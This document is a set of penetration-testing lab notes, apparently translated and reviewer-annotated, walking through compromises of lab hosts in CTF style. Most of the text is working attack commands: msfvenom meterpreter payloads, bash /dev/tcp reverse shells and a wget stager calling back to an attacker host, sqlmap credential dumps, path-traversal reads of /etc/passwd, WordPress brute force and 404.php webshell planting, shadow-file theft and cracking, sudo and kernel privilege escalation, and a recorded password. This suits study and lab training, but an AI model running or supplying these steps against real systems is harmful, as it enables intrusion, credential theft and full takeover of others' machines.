Single-user mode (reset the root password from GRUB): at the GRUB menu press `e`, on the `linux` line replace `ro recovery nomodeset` with `rw single init=/bin/bash`, press Ctrl+X to boot, then run `passwd root`.
Scan the LAN for IP-to-MAC mappings
# ARP sweep of the lab /24: lists live hosts with their MAC addresses.
# Needs root (raw sockets) and is easy to spot on the wire.
netdiscover -r 192.168.1.1/24
Free a port that another process is holding
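# Find which process owns a port before killing it.
netstat -pantu              # every TCP/UDP socket with its PID/program
netstat -lnp | grep 4444    # listeners only, filtered to the port of interest
fuser -v -n tcp 4444        # same answer via fuser
# 2169 is the PID from the original notes; take it from the output above.
# Prefer plain `kill <pid>` (SIGTERM) first and use -9 only if it is ignored.
kill -9 2169
ps -A                       # confirm the process is gone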
Restart the network service
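# Restart networking; the init script name depends on the distro.
/etc/init.d/network restart    # Debian/Ubuntu: /etc/init.d/networking restart
# Start the FTP server used in the lab.
service vsftpd start
# FTP account's home directory in the lab (presumably the uftp user's — verify with `getent passwd uftp`).
# /home/uftp
# Catch-all reverse-shell listener (-n no DNS, -l listen, -v verbose, -p port).
nc -nlvp 4444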
Information gathering
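# Service/version detection on one host.
nmap -sV 192.168.1.3
# Fast scan of all 65535 TCP ports.
nmap -T4 -p- 192.168.1.6
# NOTE(review): the scan-type flag was garbled in the source ("-Is"); -sS (SYN scan, needs root) is the likely intent — confirm.
nmap -T4 -sS -v 192.168.1.6
# Web server vulnerability scan (the source read "no -host"; nikto is the tool that takes -host).
nikto -host http://192.168.1.6
# NOTE(review): tool name garbled in the source ("themed"); left as found.
themed http://192.168.1.6
# Upgrade a dumb reverse shell to a PTY (quotes were curly in the source and would break the command).
python -c "import pty;pty.spawn('/bin/bash')"
# Lab SSH login (user@host was redacted when the notes were exported).
ssh [email protected]
# Remote MySQL login; bare -p prompts for the password instead of exposing it on the command line / in `ps`.
mysql -h 192.168.1.11 -u username_here -p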
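# msfconsole: SSH password spray against one host / one user.
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.8
set username hadi
set threads 5
# (the path had stray spaces in the source)
set pass_file /root/Desktop/common-password/hadi.txt
set verbose true
# then `run`; a successful login opens a session — upgrade it to a PTY:
python -c "import pty;pty.spawn('/bin/bash')"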
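# sqlmap against the injectable `id` parameter of cat.php (curly quotes in the source replaced with ASCII).
# "4-2" is presumably the arithmetic probe (4-2 == 2) that confirmed the injection.
sqlmap -u "http://192.168.1.8/cat.php?id=4-2" -D "photoblog" --tables
sqlmap -u "http://192.168.1.8/cat.php?id=4-2" -D "photoblog" -T "users" --columns
sqlmap -u "http://192.168.1.8/cat.php?id=4-2" -D "photoblog" -T "users" -C "login,password" --dump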
http://192.168.1.9:8080/wordpress/wp-content/themes/twentythirteen/404.php
# Re-run the ARP sweep to locate the next target, then clear the screen.
netdiscover -r 192.168.1.1/24
clear
playsms/index.php?app=main&inc=feature_sendfromfile&op=list
Upload filename used as the payload: `<?php system('uname -a');die(); ?>.php`
Reference: https://www.exploit-db.com/exploits/42003
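# Stage a Linux meterpreter ELF where the attacker's web server (192.168.1.10) can serve it.
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f elf > /var/www/html/shell
# The base64 blob from the notes decodes to:  wget http://192.168.1.10/s -O /tmp/a
# NOTE(review): it fetches "/s", not the "/shell" written above — rename one of them or the download 404s.
# d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg==
# Root shell when sudo permits perl (GTFOBins pattern; quotes were mangled in the source).
sudo perl -e 'exec "/bin/sh";'
# Interactive shell.
bash -i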
shellcd.PHP
# NOTE(review): "avws" is not an apt package name (probably Acunetix WVS, which is installed separately) — kept as found.
apt-get install avws
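# sqlmap via an injectable X-Forwarded-For header: "*" marks the injection point, --batch accepts defaults.
# (curly quotes in the source replaced with ASCII)
sqlmap -u "http://192.168.1.9" --headers="X-Forwarded-For:*" --dbs --batch
# generic form of the same command:
# sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u http://192.168.1.9 --headers="X-Forwarded-For:*" -D photoblog --tables --batch
sqlmap -u http://192.168.1.9 --headers="X-Forwarded-For:*" -D photoblog -T users --columns --batch
sqlmap -u http://192.168.1.9 --headers="X-Forwarded-For:*" -D photoblog -T users -C login,password --dump --batch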
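# Copy the stock PHP reverse shell to the desktop (/root/桌面 is the Chinese-locale Desktop directory).
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/桌面/
# Python meterpreter stager as a raw script (stray spaces in the source were extraction artifacts).
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw > /root/Desktop/shell.py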
# msfconsole handler matching the python payload generated above (set lhost/lport to match, then run).
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
# Serve the stager over HTTP from the attacker box.
service apache2 start
service apache2 status
# meterpreter, once the session comes back:
sysinfo
shell
http://192.168.1.11/wordpress/wp-content/themes/twentyfifteen/404.php
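# Local enumeration (the path had stray spaces in the source).
cat /etc/passwd
# NOTE(review): "knew togie" is garbled in the source; togie looks like a username on this target — left as found.
knew togie
# List sudo rights of the current user: first check for privilege escalation.
sudo -l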
13. CTF: directory traversal (getting a shell as www-data)
http://192.168.1.8/dbadmin/
http://192.168.1.8/dbadmin/test_db.php
OWASP ZAP (intercepting proxy / scanner)
http://192.168.1.8/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
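# Copy the stock PHP reverse shell (paths had stray spaces/words in the source).
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/Desktop
# NOTE(review): as written this renames the copy in the current directory (the system webshells dir);
# presumably a `cd /root/Desktop` happened first — and $ip/$port inside the file must point at the listener.
mv php-reverse-shell.php shell.php
# Serve the current directory on :8000 (Python 2; `python3 -m http.server` on Python 3).
python -m "SimpleHTTPServer"
nc -nlvp 4444
# Target-side path the shell ended up at; the LFI URL below includes it:
# /usr/databases/shell.php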
http://192.168.1.8/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr/databases/shell.php
# Upgrade the reverse shell to a PTY. NOTE(review): the quotes are curly in the source and must be ASCII to run.
python -c “import pty;pty.spawn(’/bin/bash’)”
14. Web security: brute-force attacks
http://192.168.1.12/secret/wp-login.php
# Add a hosts entry so the vtcsec hostname used on the next line resolves to 192.168.1.12.
gedit /etc/hosts
http://vtcsec/secret/wp-login.php
# Enumerate WordPress users; the second form adds the scheme, which wpscan needs.
wpscan --url 192.168.1.12/secret --enumerate u
wpscan --url http://192.168.1.12/secret --enumerate u
msfconsole
# Brute-force the WordPress login for user admin under /secret/.
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 192.168.1.12
# NOTE(review): dirb/common.txt is a directory-name wordlist, not a password list; it is what the notes used.
set pass_file /usr/share/wordlists/dirb/common.txt
set username admin
set targeturi /secret/
run
# PHP meterpreter (raw) — pasted into the theme's 404.php below; lport left at the 4444 default.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw
back
# Handler matching that payload.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.10
http://192.168.1.12/secret/wp-content/themes/twentyseventeen/404.php
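# meterpreter: pull the password files off the target.
download /etc/passwd
download /etc/shadow
# Merge them for John and crack (on the attacker box).
unshadow passwd shadow > cracked
john cracked
# Result recorded in the notes — presumably the password of the marlinspike user (was a bare line in the source):
# marlinspike
python -c "import pty;pty.spawn('/bin/bash')"
su - marlinspike
sudo -l
sudo bash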
15. Path traversal → privilege escalation to root
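# Local enumeration on the target (commands were case-mangled and space-padded in the source).
uname -a
cat /etc/issue
cat /etc/*-release
cat /etc/passwd
cat /etc/shadow        # only readable if already privileged
cat /etc/crontab
sudo -l                # (source had a bare `sudo` followed by `sudo the -l`)
cd /home
cd wordpress
# SSH as the user found above (login redacted in the export); the commented line is the password noted for it.
ssh [email protected]
# sWfCsfJSPV9H3AmQzw8
# sudo-permitted zip / tar → root shell (GTFOBins patterns). The file is only a placeholder argument.
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
# NOTE(review): the source lacked the `exec=` prefix, which tar's checkpoint action requires.
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash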
16. Web security: command execution
http://192.168.1.12:8080/
http://192.168.1.12:8080/test.jsp
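ls -l /tmp
ls -alh /tmp
ls -alh /home
ls -alh /home/bill
uname -a
# From the foothold on the box, run commands as bill via ssh to localhost (non-interactive, so key auth for bill — TODO confirm).
ssh bill@localhost sudo -l
# Turns the host firewall off — noisy; if an outbound port is already permitted, use that instead.
ssh bill@localhost sudo ufw disable
# attacker:
nc -lvp 444
# Quote the remote command: unquoted, `>&` and `0>&` are applied by the *local* shell to the ssh process
# (and only work if that shell is bash); quoted, bash on the remote side opens /dev/tcp itself.
ssh bill@localhost 'sudo bash -i >& /dev/tcp/192.168.1.10/444 0>&1'
cd /usr/share/webshells/jsp
cp jsp-reverse.jsp /root/桌面/
cd /root/桌面/
python -m SimpleHTTPServer
mv jsp-reverse.jsp webshell.jsp
# Drop the JSP shell into Tomcat's ROOT webapp using bill's sudo.
ssh bill@localhost sudo wget "http://192.168.1.10:8000/webshell.jsp" -O /var/lib/tomcat8/webapps/ROOT/webshell.jsp
# Tomcat only needs read access; the source used 777, which lets any local user overwrite the shell.
ssh bill@localhost sudo chmod 644 /var/lib/tomcat8/webapps/ROOT/webshell.jsp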
17. Command execution (using an integrated testing tool)
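# Bring networking up and give the lab interface a static address (ens33 is the interface in these notes).
service network start
ifconfig ens33 192.168.1.11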
Install Sparta
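# Install Sparta and its dependencies (commands were case-mangled in the source).
git clone https://github.com/secforce/sparta.git /opt/sparta
# NOTE(review): cloning the Elixir *language* repo looks unrelated to Sparta, whose dependency is the
# python-elixir package below — confirm before keeping.
git clone https://github.com/elixir-lang/elixir.git
apt-get install python-elixir
apt-get install ldap-utils rwho rsh-client x11-apps finger
cd /opt/sparta
./sparta.py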
/usr/share/dirbuster/wordlists/directory-list-1.0.txt
http://192.168.1.11/admin/
http://192.168.1.11/dev
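# Identify and look up a recovered hash.
cd /opt/
git clone https://github.com/UltimateHackers/Hash-Buster/
cd Hash-Buster
hash-identifier
python hash.py
# attacker listener
nc -nlvp 4444
# NOTE(review): this calls back to 4445 while the listener above is on 4444 — make them match (ports kept as in the notes;
# the curly quotes in the source were replaced with ASCII or the command would not run).
echo 'bash -i >& /dev/tcp/192.168.1.10/4445 0>&1' | bash
sudo su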
18. HTTP PUT upload vulnerability
# Ask the server which methods it allows on /test; an Allow header listing PUT is the finding.
curl -v -X OPTIONS http://192.168.1.11/test
Firefox: install the RESTClient add-on (to craft the PUT request)
# Copy of the stock PHP reverse shell to PUT onto the server (edit $ip/$port first).
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
http://192.168.1.3/login.php
@ btrisk.com
23. Integrated test (hard): kernel privilege escalation — intermediate web intrusion
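# Enumerate themes, plugins and users.
wpscan --url http://192.168.1.6/wordpress --enumerate at --enumerate ap --enumerate u
# (the source had this user-enumeration command with its arguments scrambled)
wpscan --url http://192.168.1.6/wordpress --enumerate u
# NOTE(review): the source generated a *python* payload with lhost=192.168.1.6 (the target's own address) while the
# handler below expects php/meterpreter. The shell is pasted into the theme's 404.php, so generate the PHP payload;
# lhost must be the attacker's address (192.168.1.10 elsewhere in these notes — confirm for this lab).
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp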
http://192.168.1.6/wordpress/
http://192.168.1.6/wordpress/wp-admin/
http://192.168.1.6/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=0&updated=true
http://192.168.1.6/wordpress/wp-content/themes/twentyfourteen/404.php
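# Find a local kernel exploit matching the target's kernel (from `uname -a`).
searchsploit ubuntu 4.4.0
cd /usr/share/exploitdb/exploits/linux/local/
cp 41458.c /root/桌面
# Compile for the target's architecture/libc; kernel exploits can crash the box — snapshot it first.
gcc 41458.c -o shellroot
# meterpreter: upload and run. Execute permission is all that is needed (the source used 777).
upload /root/桌面/shellroot
chmod 755 shellroot
./shellroot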